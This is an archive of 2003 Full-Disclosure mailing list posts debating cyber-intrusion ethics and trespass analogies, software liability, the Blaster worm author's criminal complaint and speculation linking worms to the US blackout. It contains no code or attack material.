--On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser [EMAIL PROTECTED] wrote: I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own. And the difference is? Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Whenever someone makes the analogy about breaking into someone's computer and breaking into someone's house, I always must suggest otherwise. Say I live across the street from you, and am out on my lawn talking to you while you're on your lawn, yelling across the street. And let's say that through this conversation, I get you to accidentaly yell your social security number at me. (this is also assumeing I don't do anything with your SS number) Who's fault is this? I'm not saying that my analogy works better than yours, i'm just saying that there exists no perfect analogy between the electronic and physical world, and that applying conventional property laws to the internet ( or intellectual property) is a bad idea. So could we all stop trying to force our instinctive reactions about cyber-ethics on everyone else, and actualy think for a little while about what really is acceptable and inacceptable? Could we finally stop treating these definitly non-physical-world problems as such, and stop applying laws and ethics intended for physical property on issues that certainly have no connection to physical property? This is a dificult topic. I certainly don't have the answers. But let's think about this first, not argue our first reactions. On Sat, 2003-08-30 at 09:37, [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi Donald, Interesting (child-like) thoughts, Interesting, to me it seems most child like to me to attempt apply concepts from a familiar world to an unfamiliar world, rather than trying to understand the unfamiliar world for what it is itself. -- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] xss holes
Hi, are there any paper about xss holes testing. My company is developing a new php app and want to test it to make it a litle more secure. thx -- Servicios de Seguridad Informatica www.masev.cl ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] GOOD: A legal fix for software flaws?
In some mail from Jeremiah Cornelius, sie said: Darren Reed wrote: I, for one, would not cry if the law made it impossible to sell or provide GPL'd software to people because it could not be provieded with a disclaimer. Sooner or later the software industry needs to grow up and take responsibility for the crap that it unloads onto the world, pretending it to be a product worth using. GPL software especially. You sir, were just flagged with the troll-bit across all your posts. The fact that you equate the production and use of software /only/ with an industry of some sort demonstrates the level of your indoctrination. And I should care about this because...? There are arguments for software as speech. I do not claim to support all of these - but you are clearly in the ideological camp of the control-freaks. When we can no longer use our machines for anything but software from a govenment provided white-list, and are unable to uninstall select bits - we will have people with positions like yours to thank. Nope, you're wrong but if you don't understand why I might say that (and clearly you don't) then any argument from me will be wasted on you. Jeremiah Cornelius, CISSP, CCNA, MCSE And your comments quite clearly show that certifications do not equate to mental agility. Maybe you should stick to responding to topics that were covered in your exams for the said courses. Darren ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] The Jeffrey Parson criminal complaint is online
Richard M. Smith wrote: http://news.findlaw.com/nytimes/docs/cyberlaw/usparson82803cmp.pdf Great link. Items of particular interest: Page 9, lines 6-8: Since dl.t33kid.com is a copy of www.t33kid.com, it also can be used to capture IP addresses of compromised computers. Isn't that reaching a bit, since the worm doesn't apparently know about dl.t33kid.com? Page 10, lines 10-11: Microsoft expended significant internal and external (e.g., contracted) resources to respond to the DDos attack launched by JEFFREY LEE PARSON. Page 6, lines 12-14: Within three days, Blaster had infected an estimated one hundred thousand to two hundred thousand computers. By August 15, 2003, estimates were as high as more than one million infected computers. Page 16, lines 16-18: ...at least 7,000 individual Internet users' computers were compromised by the variant of the Blaster worm that was released by JEFFREY LEE PARSON. So, it sounds like he's responsible for 7,000 out of 100,000 to 1,000,000 infected computers. Unfortunately for him, he's the one stupid enough to use his handle in the code, so he's the one that shows up on CNN as the culprit for everything. While I do not wish to give the impression that I condone or mitigate the damage done by Parson's variant, I suspect he's going to get held responsible for the overall worm while interest in finding the original culprits wanes. -- gowen -- Greg Owen -- [EMAIL PROTECTED] 79A7 4063 96B6 9974 86CA 3BEF 521C 860F 5A93 D66D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] MS Blaster author / morning_wood misinformed
| --On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser | [EMAIL PROTECTED] wrote: | | I don't know about US, Canadian, German or Chinese law. But | in Dutch law | there is a big difference between entering a house and | stealing stuff and | breaking into a house and stealing exactly the same stuff. | Apparently the | house owner has a responsibility of his own. | | And the difference is? | | Paul Schmehl ([EMAIL PROTECTED]) | Adjunct Information Security Officer | The University of Texas at Dallas | AVIEN Founding Member | http://www.utdallas.edu Some jurisdictions view the defeating of a locked door differently than simply turning the knob on an unlocked door. Don't know why, but they do. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] MS Blaster author / morning_wood misinformed
Hi Paul, The difference is Breaking and Entering vs Trespassing. They carry different penalties, just like Grand Theft Auto is not the same as Unauthorized Use of a vehicle. There are real differences in terms in arrests and judgements. Not that it really matters... cheers, bob On Sat, 30 Aug 2003, Paul Schmehl wrote: --On Saturday, August 30, 2003 6:22 PM +0200 Peter Busser [EMAIL PROTECTED] wrote: I don't know about US, Canadian, German or Chinese law. But in Dutch law there is a big difference between entering a house and stealing stuff and breaking into a house and stealing exactly the same stuff. Apparently the house owner has a responsibility of his own. And the difference is? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Fwd: Computers crashed just before blackout
Subject: Re: [Full-Disclosure] Fw: Computers crashed just before blackout To: Geoff Shively [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Date: Fri, 29 Aug 2003 18:25:05 -0400 (EDT) (notes below...) - Original Message - From: Richard M. Smith [EMAIL PROTECTED] http://www.cleveland.com/news/plaindealer/index.ssf?/base/news/106207424774610.xml Computers crashed just before blackout ... Yep, looks like the HMI systems (that allow the humans to see warnings and critical situations) and to manually reroute power went down. Bet you 30,000 quatros that those HMI systems communicated to the SCADA systems via DCOM. ... You might be interested in an article we published last week: --- Did the Worm Topple the Power Grid? The IT Safety of the US Power Supply By now, the cause of the massive blackout in the United States has been more or less been determined. But for several days after the blackout, the cause of the domino effect that pushed 21 power stations offline remained obscure. Numerous leads pointed to a link between the events and the W32.Lovsan worm that was simultaneously ravaging the Internet. Even if the ongoing investigations should eventually come to a different conclusion, once thing is certain: The IT systems of the energy utility companies are vulnerable. http://www.heise.de/ct/english/03/18/034/ bye, ju -- Juergen Schmidt Leitender Redakteur/senior editor c't magazin Heise Zeitschriften Verlag, Helstorferstr. 7, D-30625 Hannover Tel. +49 511 5352 300 FAX +49 511 5352 417 EMail [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html